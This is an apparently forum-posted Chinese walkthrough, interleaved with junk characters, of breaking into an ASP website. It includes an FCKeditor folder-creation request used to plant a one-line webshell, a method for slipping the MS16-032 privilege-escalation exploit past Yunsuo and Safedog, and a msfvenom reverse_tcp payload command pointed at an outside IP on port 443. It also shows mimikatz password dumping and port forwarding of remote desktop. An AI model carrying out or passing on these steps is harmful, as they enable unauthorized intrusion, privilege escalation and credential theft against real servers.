+ H+ R( ?% F9 C* H' | D) |
- {3 S, k; g6 o7 W0 q5 Y7 n5 n/ d6 S+ P ' @: o/ c8 t; @/ x) A/ \
1 \" Y: b8 u0 d: Q3 D k4 G" t/ N& U
9 p" R/ t' c. `; B* Y( D
, [. B) @4 A4 W6 b4 ^# h
: l w; P- J! y ?5 w- s一、 利用getwebshell篇
) T( r* i+ F% f/ r. l+ [
6 c* o% ] i: R首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图: $ R) n+ L% g8 ?/ e5 {% o( o
 2 {9 i4 c1 c2 F) y
 $ n3 V, _+ }1 T2 s0 ~
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
; M* `* A2 @, f. L4 k* o/ y) B
" J* i( P4 R! ?, U; H下面我们构造一个asp目录,如: ( w6 H2 M' h' s' N- k+ p
7 t* a) Q$ g* J3 Z. i3 Z
^( U; Z( f' {! o
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 " m( Q# v9 M7 m# i9 |/ d/ e
. k% F: a! W' n( g4 l! @1 z2 T2 K % y4 z9 V( ]! a7 p
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。 5 |7 u! Z5 o8 h+ i: k
' C1 [# `0 N% d5 b, b! q* e0 X/ J! S
一、 绕过安全狗云锁提权并且加账号
. G& s' i$ t; {; \ ) R+ x$ @$ e/ R% ?$ H7 C- x
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干 0 R8 M( ?; o' k2 E ?1 [) s) W
; c) N# z! C$ }; h5 g$ W- V) l如图:
9 k7 o- w9 T, o4 H- B! r' ~/ K# ]
& L, Z3 \4 ]9 I( F" q: R然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit # s4 N) f) D2 F# c% ]4 v; y
( l: f# W' x8 S3 s+ J% a$ C$ q0 \一、 利用metasploit 7 Z# { K1 {0 G
8 {1 B3 \( w9 v2 y4 r
首先用pentestbox生成一个64位的payload如下命令 8 z) q0 h% B9 g4 i' [8 f
! M( z3 l! X8 e: }
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe # g6 `! U% E& S7 o% u R# ~( E, q
* a6 O* K& m& F1 d! M3 W- Z* v为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图: # H# z' }* a, G5 i" L8 l6 R

# e6 y( Z4 U) b: T9 K6 z下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图: : y! v6 Y( l6 {4 Y2 w

/ \# C( o% ^- _下面我们来做一个监听如下命令: 7 U4 B- _" f# Y( Z
1 e9 }) S8 ]" {% d0 d& ~; S
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图: * K ^ z* D! d8 k) \. X
6 @6 q; @( N8 q+ P2 A
# g" }7 l c$ I( g: J
|
( p# h: Q9 y& [% B( ?" t; v 6 a" _1 I1 e- f! V6 C3 b% X
; p' x' G% @& v6 d8 E8 k% e
; P* e: L" g/ O2 k1 s8 D1 ]- d4 m
) E( P$ Q- x0 J! [
: v/ g g* K5 X I! i! t
8 r' {2 n# A3 ] 0 P+ o0 P: L' }0 u
. V1 M3 M( V' U$ n, K3 z
4 G7 w# `9 h4 l' P3 l& b- F! `9 q6 C
. m* I( J' U0 ~) b% M
0 \4 R6 j3 Q: ?: _9 K8 z& a) }1 V# S* p
' \6 l3 n# k& n. ~! s
|